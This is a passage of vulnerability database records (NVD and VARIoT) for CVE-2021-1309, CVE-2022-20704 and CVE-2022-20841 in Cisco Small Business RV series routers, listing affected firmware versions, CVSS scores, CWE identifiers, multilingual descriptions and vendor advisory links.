                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "4165E6FA-C876-45B4-B48A-7B1D51A028BA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "1B8FB0F6-CAE9-481C-9FC7-69CA0660F506",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "35729306-0CFF-4ACD-B77D-172A92FD67DF",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "784C42BE-E7CD-45F0-8209-436F54812C1D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "BEA2331F-521F-4987-83A1-6D0D458B41DB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "90F3DC42-58C9-4BC4-AFCC-077C0BDAAB2E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:1.0.0.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "5FB2292D-20C8-4929-9802-7FC770952200",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                     matchCriteriaId: "3E16124B-9448-47A0-A6BF-A95B37446E91",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:1.0.1.20:*:*:*:*:*:*:*",
                     matchCriteriaId: "948587E0-67B8-4A80-AFAA-96A22F522F42",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).",
      },
      {
         lang: "es",
         value: "Múltiples vulnerabilidades en la implementación del Link Layer Discovery Protocol (LLDP) para Enrutadores Cisco Small Business RV Series. Un atacante adyacente no autenticado podría ejecutar código arbitrario o causar que un enrutador afectado filtre la memoria del sistema o se recargue. Una pérdida de memoria o una recarga del dispositivo podrían causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Para mayor información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso. Nota: LLDP es un protocolo de capa 2. Para explotar estas vulnerabilidades, un atacante debe estar en el mismo dominio de transmisión que el dispositivo afectado (adyacente a Capa 2)",
      },
   ],
   id: "CVE-2021-1309",
   lastModified: "2024-11-21T05:44:03.693",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "ADJACENT_NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 8.3,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:A/AC:L/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 6.5,
            impactScore: 10,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "ADJACENT_NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.4,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.8,
            impactScore: 4,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "ADJACENT_NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 8.8,
               baseSeverity: "HIGH",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.8,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2021-04-08T04:15:12.063",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-119",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-401",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2022-02-10 18:15
Modified
2024-11-21 06:43
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "2C925382-A223-4342-83D2-53B3071F9B45",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DDD6C848-8EF9-410A-B899-02F0E03EB653",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CE4C000C-89AB-4255-8D2B-4520BCB90490",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0EA14E0B-442A-467D-92FF-369AD3A1A294",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "54D9FCD7-3DB5-413E-B504-8658A2D38EB7",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "30C2C2D2-9466-4A3F-A96C-166E32742C6C",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A21C17DD-A010-4744-9E06-DB845C5A1F00",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "428E4FFE-60EA-4BC1-BF13-FE50F5B093C0",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ED00C268-23EB-4743-8EF1-EEA2BE8A7566",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
      },
      {
         lang: "es",
         value: "Múltiples vulnerabilidades en los routers Cisco Small Business RV160, RV260, RV340 y RV345 Series podrían permitir a un atacante realizar cualquiera de las siguientes acciones Ejecutar código arbitrario. Elevar los privilegios. Ejecutar comandos arbitrarios. Omitir las protecciones de autenticación y autorización. Obtener y ejecutar software no firmado. Causar una denegación de servicio (DoS) Para obtener más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso",
      },
   ],
   id: "CVE-2022-20704",
   lastModified: "2024-11-21T06:43:22.110",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 5.8,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:M/Au:N/C:P/I:P/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 4.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 10,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 6,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "HIGH",
               attackVector: "NETWORK",
               availabilityImpact: "NONE",
               baseScore: 4.8,
               baseSeverity: "MEDIUM",
               confidentialityImpact: "LOW",
               integrityImpact: "LOW",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
               version: "3.1",
            },
            exploitabilityScore: 2.2,
            impactScore: 2.5,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2022-02-10T18:15:09.253",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-121",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-787",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

var-202208-0323
Vulnerability from variot

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. RV160 VPN router firmware, RV160W Wireless-AC VPN router firmware, RV260 VPN Multiple Cisco Systems products, including router firmware, contain vulnerabilities related to input validation.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202208-0323",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv340w",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.26",
         },
         {
            model: "rv345",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.26",
         },
         {
            model: "rv260w",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260p",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv340",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.26",
         },
         {
            model: "rv345p",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.26",
         },
         {
            model: "rv160w",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260w wireless-ac vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160 vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn ルータ with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260 vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
         {
            db: "NVD",
            id: "CVE-2022-20841",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.26",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.26",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.26",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.26",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20841",
         },
      ],
   },
   cve: "CVE-2022-20841",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [],
            cvssV3: [
               {
                  attackComplexity: "HIGH",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 9,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 2.2,
                  impactScore: 6,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 2,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "High",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 9,
                  baseSeverity: "Critical",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2022-20841",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Changed",
                  trust: 0.8,
